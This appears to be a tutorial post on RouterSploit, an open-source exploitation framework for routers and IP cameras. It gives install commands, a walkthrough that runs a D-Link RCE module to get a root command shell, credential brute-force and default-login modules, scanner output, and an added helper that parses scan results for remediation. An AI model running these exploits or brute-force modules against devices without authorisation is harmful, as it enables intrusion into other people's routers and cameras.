Router Exploitation Framework – RouterSploit
Introduction
The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. If you want to evaluate the security of devices such as routers and IP cameras and perform a penetration test against them, you can use the RouterSploit framework.
RouterSploit – Exploitation Framework for Embedded Devices
Some Features:
- It’s coded in Python
- Command line interface
- Docker support
- Modular Tools
Supported platforms:
- Linux (Kali, Debian, Ubuntu, CentOS), macOS/Mac OS X, Raspberry Pi, Windows, and also unrooted Android phones.
If you’re already familiar with the Metasploit framework, you’ll find the RouterSploit commands easy to use. It comes with several kinds of modules for penetration testing (scanning and exploiting devices):
- exploits – modules that take advantage of identified vulnerabilities
- creds – modules that test credentials against network services
- scanners – modules that check if a target is vulnerable to any exploit
- payloads – modules that generate payloads for various architectures and injection points
- generic – modules that perform generic attacks
RouterSploit Install
Dependencies
- future, requests, paramiko, pysnmp, pycrypto
- bluepy – bluetooth low energy (optional)
- gnureadline (OSX only)
Kali Linux:
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
For Bluetooth Low Energy support, run the following:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
Ubuntu (18.04 / 17.10):
sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
For Bluetooth Low Energy support, run the following:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
OSX:
git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py
Running on Docker
git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit
Update:
cd routersploit
git pull
Usage
root@kalidev:~/git/routersploit# ./rsf.py

 [RouterSploit ASCII-art banner]
 Exploitation Framework for Embedded Devices
 by Threat9

 Codename   : I Knew You Were Trouble
 Version    : 3.3.0
 Homepage   : https://www.threat9.com/ - @threatnine
 Join Slack : routersploit.slack.com

 Join Threat9 Beta Program - https://www.threat9.com/

 Exploits: 128 Scanners: 4 Creds: 165 Generic: 4 Payloads: 32 Encoders: 6

rsf >
Exploits
To perform the exploitation, just pick the module and set the target:
rsf > use exploits/
exploits/2wire/     exploits/asmax/     exploits/asus/      exploits/cisco/     exploits/dlink/
exploits/fortinet/  exploits/juniper/   exploits/linksys/   exploits/multi/     exploits/netgear/
rsf > use exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >
Use the Tab key for completion.
To display the options, type show options:
rsf (D-LINK DIR-300 & DIR-600 RCE) > show options

Target options:

   Name       Current settings     Description
   ----       ----------------     -----------
   target                          Target address e.g. http://192.168.1.1
   port       80                   Target Port
Use the run or exploit command to exploit the target:
rsf (D-LINK DIR-300 & DIR-600 RCE) > run
[+] Target is vulnerable
[*] Invoking command loop...
cmd > whoami
root
To set options:
rsf (D-LINK DIR-300 & DIR-600 RCE) > set target http://192.168.1.1
[+] {'target': 'http://192.168.1.1'}
It’s possible to check whether the target is vulnerable to a particular exploit before running it:
rsf (D-LINK DIR-300 & DIR-600 RCE) > check
[+] Target is vulnerable
Run show info to display information about the exploit.
Creds
Modules located under the creds/ directory allow running dictionary attacks against various network services. Supported services:
- ftp
- ssh
- telnet
- http basic auth
- http form auth
- snmp
Every service is divided into two modules:
- default (e.g. ssh_default) – uses one wordlist of default credential pairs in login:password format.
- bruteforce (e.g. ssh_bruteforce) – performs dictionary attacks against a specified account or list of accounts. It takes two parameters: login and password.
rsf > use creds/
creds/ftp_bruteforce         creds/http_basic_bruteforce  creds/http_form_bruteforce   creds/snmp_bruteforce
creds/ssh_default            creds/telnet_default         creds/ftp_default            creds/http_basic_default
creds/http_form_default      creds/ssh_bruteforce         creds/telnet_bruteforce
rsf > use creds/ssh_default
rsf (SSH Default Creds) >
To display the options and run the module, use the same commands as for an exploit.
Scanners
Scanners allow you to quickly verify whether the target is vulnerable to any of the exploits for a vendor. Use the same commands to display and set options, and to run the module.
rsf (D-Link Scanner) > run
[+] exploits/dlink/dwr_932_info_disclosure is vulnerable
[-] exploits/dlink/dir_300_320_615_auth_bypass is not vulnerable
[-] exploits/dlink/dsl_2750b_info_disclosure is not vulnerable
[-] exploits/dlink/dns_320l_327l_rce is not vulnerable
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_rce is not vulnerable

[+] Device is vulnerable!
 - exploits/dlink/dwr_932_info_disclosure
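When a scanner run covers many devices, the per-module result lines are what you want to keep for remediation tracking. The helper below is an added example, not part of RouterSploit or of this post: it parses the scanner output format shown above into vulnerable and not-vulnerable module lists and summarises them per vendor; the sample input is constructed from the D-Link run above.

```python
import re
from collections import defaultdict
from typing import Dict, List

# Constructed sample input: the result lines of the D-Link scanner run shown on this page.
SAMPLE_OUTPUT = """\
[+] exploits/dlink/dwr_932_info_disclosure is vulnerable
[-] exploits/dlink/dir_300_320_615_auth_bypass is not vulnerable
[-] exploits/dlink/dsl_2750b_info_disclosure is not vulnerable
[-] exploits/dlink/dns_320l_327l_rce is not vulnerable
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_rce is not vulnerable
[+] Device is vulnerable! - exploits/dlink/dwr_932_info_disclosure
"""

# One result line: status marker, module path, then "is vulnerable" or "is not vulnerable".
RESULT_RE = re.compile(r"^\[([+-])\]\s+(exploits/\S+)\s+is\s+(not\s+)?vulnerable\s*$")


def parse_scan(output: str) -> Dict[str, List[str]]:
    """Return module paths reported as vulnerable / not vulnerable.

    The trailing "Device is vulnerable!" summary, prompts and banner lines do
    not match RESULT_RE, so they are skipped rather than double counted.
    """
    findings: Dict[str, List[str]] = {"vulnerable": [], "not_vulnerable": []}
    for line in output.splitlines():
        match = RESULT_RE.match(line.strip())
        if not match:
            continue
        marker, module, negated = match.groups()
        if marker == "+" and negated is None:
            findings["vulnerable"].append(module)
        elif marker == "-" and negated is not None:
            findings["not_vulnerable"].append(module)
    return findings


def vendor_summary(findings: Dict[str, List[str]]) -> Dict[str, Dict[str, int]]:
    """Count checked and vulnerable modules per vendor (second path component)."""
    summary: Dict[str, Dict[str, int]] = defaultdict(lambda: {"checked": 0, "vulnerable": 0})
    for status, modules in findings.items():
        for module in modules:
            vendor = module.split("/")[1]
            summary[vendor]["checked"] += 1
            if status == "vulnerable":
                summary[vendor]["vulnerable"] += 1
    return dict(summary)
```

Feed it the captured output of a scanner run and keep the "vulnerable" list as the patch/mitigation backlog for that device.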